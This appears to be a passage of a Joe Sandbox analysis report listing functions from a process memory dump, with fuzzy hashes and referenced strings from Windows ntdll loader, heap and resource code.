                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: 59e73ee04f75775c167c2d9747a37ec85ad637b0625182318d7358c37de7e79b
                                  • Instruction ID: 5df415dde7df370206920525cea09a21228d8824dd52e1e0890b721c57479810
                                  • Opcode Fuzzy Hash: 59e73ee04f75775c167c2d9747a37ec85ad637b0625182318d7358c37de7e79b
                                  • Instruction Fuzzy Hash: 2F71DF71E002059FDF24DF68CD81AAEB7F5FB44714F18412AE846AB351EB39AD41EB41
                                  Function 00F80A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 1d3cd5fbbc2025b9bf9805741dd1c3d80ef9888f23757ce1c22f2995b269178d
                                  • Instruction ID: 54ad5df7ce6195d75fd805ba67b6340c1367d6d7fda9fbdcdc36b3ebbc3e6191
                                  • Opcode Fuzzy Hash: 1d3cd5fbbc2025b9bf9805741dd1c3d80ef9888f23757ce1c22f2995b269178d
                                  • Instruction Fuzzy Hash: 3561E2316007019FDB68DF24C841BAABBE2FF44714F14846AE495CF392CB74E885EB91
                                  Function 00FAC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 00FE82DE
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FE82E8
                                  • Failed to reallocate the system dirs string !, xrefs: 00FE82D7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                  • Instruction ID: 3a262e8b87325d03268a94446f118c43ca641cf6be3127210c80acaf5594b47e
                                  • Opcode Fuzzy Hash: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                  • Instruction Fuzzy Hash: 0F41C4B1544304ABC730EB64DD45B5B77E8EF49B60F04452AF988D7261EB79EC00ABD1
                                  Function 0102C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0102C1C5
                                  • @, xrefs: 0102C1F1
                                  • PreferredUILanguages, xrefs: 0102C212
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                  • Instruction ID: 355bd0f4cb642b6024c675f575ad8a05fb5f3bb4d67add4bf6598967b8c18bf9
                                  • Opcode Fuzzy Hash: 9baa6cbc5fb20a5f009e7df1b21861a78372d13141c09e94006c3b31c2163720
                                  • Instruction Fuzzy Hash: A441B271E00219EBEF11DAD8CD41FEEBBF8AB15704F04406AEA49B7280DB749E088B50
                                  Function 01004144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                  • Instruction ID: 21a3fa241df5fa1a305e1c8801b90e76929a79f1d2e0b0a24aec31aab7cc0670
                                  • Opcode Fuzzy Hash: e3cf4a7a001f70082d33007e21d706de7e14f1d84091c85d1bdc6df3d10d40b9
                                  • Instruction Fuzzy Hash: F041E372A042488BFB22EB99CC41BEDBBF4EF45740F140499EA81EB7D2D7389901CB15
                                  Function 00FF4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 00FF4899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FF4888
                                  • LdrpCheckRedirection, xrefs: 00FF488F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                  • Instruction ID: e78b934b9b25f95f0c9d77db55ce5783d846bbb5e4d062218d2352aec2ae016a
                                  • Opcode Fuzzy Hash: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                  • Instruction Fuzzy Hash: 26418E33A046589BCB21DE589840A377BE4BF49BA0F050669EE9897375E725FC00EB91
                                  Function 00F80BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: b35061680f245a99ac90d225493eb3102de7aee895b4774cba35fd14eb0370cf
                                  • Instruction ID: d34312ef04bc1129f8b59ed07010e5af7838b90459ec191ad0aa13d577c1fc2a
                                  • Opcode Fuzzy Hash: b35061680f245a99ac90d225493eb3102de7aee895b4774cba35fd14eb0370cf
                                  • Instruction Fuzzy Hash: 78110632315941DFD768E714C861BB6B3A5EF81B25F28812AE406CB351DB34DC84F752
                                  Function 00FF20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 00FF2104
                                  • Process initialization failed with status 0x%08lx, xrefs: 00FF20F3
                                  • LdrpInitializationFailure, xrefs: 00FF20FA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: f8767194ba728975b55c388b40dd55e5d8d6484c6a916e094c64917c9ea24f9d
                                  • Instruction ID: 658e97e4f00ce44f6e76f0946754fcc11262dd404c130bb14f45acba2c5df24f
                                  • Opcode Fuzzy Hash: f8767194ba728975b55c388b40dd55e5d8d6484c6a916e094c64917c9ea24f9d
                                  • Instruction Fuzzy Hash: B6F0C271A4030CBBD734E64CDC53FA9376CFB41B55F100069FB44AB292D6B8A944EA96
                                  Function 00F803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                  • Instruction ID: 71d74badbfa61a78bf512f82c957ecd1c95508752c4e600574018967353af6fa
                                  • Opcode Fuzzy Hash: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                  • Instruction Fuzzy Hash: 3F714D72E0114A9FDB01EF98C991BEEB7F9AF08744F144065E905E7252EB38EE05DB60
                                  Function 00F7A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 00F7AA25
                                  • LdrResSearchResource Enter, xrefs: 00F7AA13
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
                                  • Instruction ID: 33be2c822d539b5b6e789233b2a88eeaed9aa85bd7cf923be1dc1aa369cf89f7
                                  • Opcode Fuzzy Hash: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
                                  • Instruction Fuzzy Hash: 0CE1A372E04219DBEB21DF98C980BAEB7BAAF94310F158427E905E7240D7389D40EB53
                                  Function 0103A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: ce46e4b37d87d8e013d08e69cdbf34dd620f862cbb7ce067a480a284ac79e695
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 34C19C313043469BEB25CE28C841B6BBBE9AFC8318F084A6DF6D6CB291D775D505CB91
                                  Function 00FEE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 3335401f9ba7391bc3be4ab881330c677e6d1fe3ee20ecb4e8ef70ba36828b74
                                  • Instruction ID: cbbddffdbff9447fc5c119c9b8a23ba55fe58363ffa991e5541cd6de9bbe1e83
                                  • Opcode Fuzzy Hash: 3335401f9ba7391bc3be4ab881330c677e6d1fe3ee20ecb4e8ef70ba36828b74
                                  • Instruction Fuzzy Hash: C2616D72E002589FDB14DFA9D841BADBBB9FB44740F20406DE559EB291D731EE00EB50
                                  Function 010143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                  • Instruction ID: cd59c8b4defa8b4d2cfa11890ad8bdf71cd62684866cf7fd1fcef1da091e8610
                                  • Opcode Fuzzy Hash: 8cccacd4a67fef7d34f9f62c00f3ad3d834ab738e898b9184a8411358a012ed9
                                  • Instruction Fuzzy Hash: 485139B1E0021DAFDF11DFA9CC81AEEBBB8EB48754F100529E611F7291DB399905CB60
                                  Function 00F704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  • kLsE, xrefs: 00F70540
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F7063D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  • Opcode ID: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                  • Instruction ID: cab6196730b601a969f0349bc8aaf6e459d393dc9e37c4a92747057cae2330cc
                                  • Opcode Fuzzy Hash: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                  • Instruction Fuzzy Hash: 9951AB71904746DBC724EF28C9406A7B7E4AF84314F04883EE9AE87281EB74E945DF92
                                  Function 00F7A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00F7A2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00F7A309
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
                                  • Instruction ID: 2d4ad65f8419ea6a42ba1bffb8d40d707267eda6ad7757e49c2dbf3e78ce7374
                                  • Opcode Fuzzy Hash: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
                                  • Instruction Fuzzy Hash: 9241BD31A04649CBDB51DF59C840B6E77B5EF94710F2980A7E808DB3A1E376D900EB82
                                  Function 00FAA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: e800a7032a7146629a366d96a52cc234fa297504c4e80f614fdb6d18789e8235
                                  • Instruction ID: 554740cd99a8744f3251dc6218ad8703b4e0b227edc8eb61dfeb35f842ecbb0f
                                  • Opcode Fuzzy Hash: e800a7032a7146629a366d96a52cc234fa297504c4e80f614fdb6d18789e8235
                                  • Instruction Fuzzy Hash: AF01D1B2240700AFD311DF14CE46B1677E8E745B15F048939B548C7291E778D808EB46
                                  Function 00F7C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                  • Instruction ID: 1eec9cde4824a16cad0462f87d14edc134e0bbdf9022af64b532d2f1ca6d2fc9
                                  • Opcode Fuzzy Hash: fe64a52ae1de536c01ef64bad9f58167714dbc6fe572b350b71ccb1058a163bb
                                  • Instruction Fuzzy Hash: A8825C75E002188BDB24CFA9C880BEDB7B5BF48310F54C16AE85DAB351D7349D81EB92
                                  Function 00FF6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                  • Instruction ID: 71d0525b28baa521021b58f37e9d568c643187cb42d44a999974e5a1266a23a2
                                  • Opcode Fuzzy Hash: e651be3b5ec3f6a1e61705edc10640ce1603b2db11a60bc838fd6f58bed84b4f
                                  • Instruction Fuzzy Hash: ED9171B2A00219AFEB21DB95CD85FEE77B8EF45B50F140065F600FB1A1DA75AD04DBA0
                                  Function 0101E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                  • Instruction ID: 3e10a7ca2778cf83637cdae399ebea9a90ad2c26439c201730038eb94b8e8106
                                  • Opcode Fuzzy Hash: 9fa32ccb83c85c70ad26febf24b0637d30703f5a0530c6fe32724cb9e310e80b
                                  • Instruction Fuzzy Hash: 7091CE71900608BFDB23ABA4DC55FEFBBB9EF85740F100029F941A7251DB799901DB90
                                  Function 00FAA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: d3bb4c0a79e467e3dcf5803a5e75e0e8e0cd6c11e203f995707bebd81173f037
                                  • Instruction ID: 5672db2b356bd288baf7bc28fcb3d0de199094eb47f56c22868e4e6441f7ac65
                                  • Opcode Fuzzy Hash: d3bb4c0a79e467e3dcf5803a5e75e0e8e0cd6c11e203f995707bebd81173f037
                                  • Instruction Fuzzy Hash: D2716E75E0024ACFDF28CF9AC9906ADBBB1BF68794F24812EE405E7241DB359D41EB50
                                  Function 01014978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  • Opcode ID: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                  • Instruction ID: b71d5c7babe7a42c0d9c2a3983f0d8f7dfe9c21f1e58026e7928e7b04146c58d
                                  • Opcode Fuzzy Hash: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                  • Instruction Fuzzy Hash: 9F519072D002299BDF10DF99D880AEEBBB4BF04B10F05416AFA55FB265D77C9901CBA4
                                  Function 00F8E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  • Opcode ID: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                  • Instruction ID: dbf496ed565ff6bdcb8c2c5ff66d7f19be5648c74e8913bb0566e373a26e585b
                                  • Opcode Fuzzy Hash: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                  • Instruction Fuzzy Hash: AA4192729083129BD710FB75CC41BAFB7D8AF88B14F440929F9A4E7180E678D904A797
                                  Function 00FEC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: 538a9ebe78966fc29669d55dd7d7c31bb531b59d933a3b4feb1395b131f31a37
                                  • Instruction ID: 927aa526cdd25b93dabb06059406cfb21675ec6feaaee3a1ea90e8209784d779
                                  • Opcode Fuzzy Hash: 538a9ebe78966fc29669d55dd7d7c31bb531b59d933a3b4feb1395b131f31a37
                                  • Instruction Fuzzy Hash: 594180F1D0026CABDB20DA61CD81FDEB77CAB45714F0045A5FA08AB141DB749E899FE4
                                  Function 01006B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  • Opcode ID: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                  • Instruction ID: 61a2cd2f861f0a68a08872c7e31cc8702607bf9d2a03a87c94699ea12a28aba1
                                  • Opcode Fuzzy Hash: a3aa68492fb2e1c3a73ddb7a8685678bd0911017b10c1945e5d33be3303d7b01
                                  • Instruction Fuzzy Hash: 0331D131A006199AFB23DA69C850FEA7BA9DF05704F144068E981AB2C2CB6AE955CB50
                                  Function 00FECA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  • Opcode ID: 7d3624a3dc7e4534a2d8a0958e8f1a504e81e6abd966e6c7b7d41f510fe64146
                                  • Instruction ID: 0d19771285bea4c2446ce4f5bad973e704215ac48d55d3e03b01264be52e383a
                                  • Opcode Fuzzy Hash: 7d3624a3dc7e4534a2d8a0958e8f1a504e81e6abd966e6c7b7d41f510fe64146
                                  • Instruction Fuzzy Hash: 56310336D00559AFDB15DA5AC852EAFB774EBC0B20F114129F811AB291D7309E06EBE0
                                  Function 00FF892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FF895E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
                                  • Instruction ID: 34b07d0eff3eff43983c091b6fe15f96a093286c3c7be18cbe514cf07bfd8835
                                  • Opcode Fuzzy Hash: c8262a2ecc10831351cbf1f81914afc7ec5f655d5ea5f0f3a79561d485b3bdef
                                  • Instruction Fuzzy Hash: 6901F2326002099FD7306E51CC85B7A7BA9EF86BE4F041029F78106572CFA5AC82F796
                                  Function 01012000 Relevance: .8, Instructions: 757COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                  • Instruction ID: a215a506b1225933ff4e5b4d8fa4e20d90ea8d9deb5c337929888602fffc823c
                                  • Opcode Fuzzy Hash: 7731edbfdc18f47e86477d224a75650a348d1631f5c39b9b980638cd4418ea13
                                  • Instruction Fuzzy Hash: EE42F3316083419FE765DF68C890A6FBBE5BF88700F28096DFAC297259D738D845CB52
                                  Function 01008158 Relevance: .6, Instructions: 617COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
                                  • Instruction ID: 6836a67ea45bdc362205f6e11efa2aa1004bb9d2c767abd11f148544876ecf6a
                                  • Opcode Fuzzy Hash: 17c2af8b3fdd7328168a311cbd7eb06e57413a805beed2c4f398df1e0f66339a
                                  • Instruction Fuzzy Hash: EF424E75E002198FEB65CF69CC41BADBBF5BF48310F15C09AE589AB282DB349985CF50
                                  Function 00F82840 Relevance: .6, Instructions: 605COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
                                  • Instruction ID: d7efd248d2773cd81b00c326b85d2eaabcac62b8a786fd91ab9df135aa9f7758
                                  • Opcode Fuzzy Hash: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
                                  • Instruction Fuzzy Hash: E132AC71A007558BDB24DF69C8547BEBBF3AF84714F28411AE486DB384DB39A842EB50
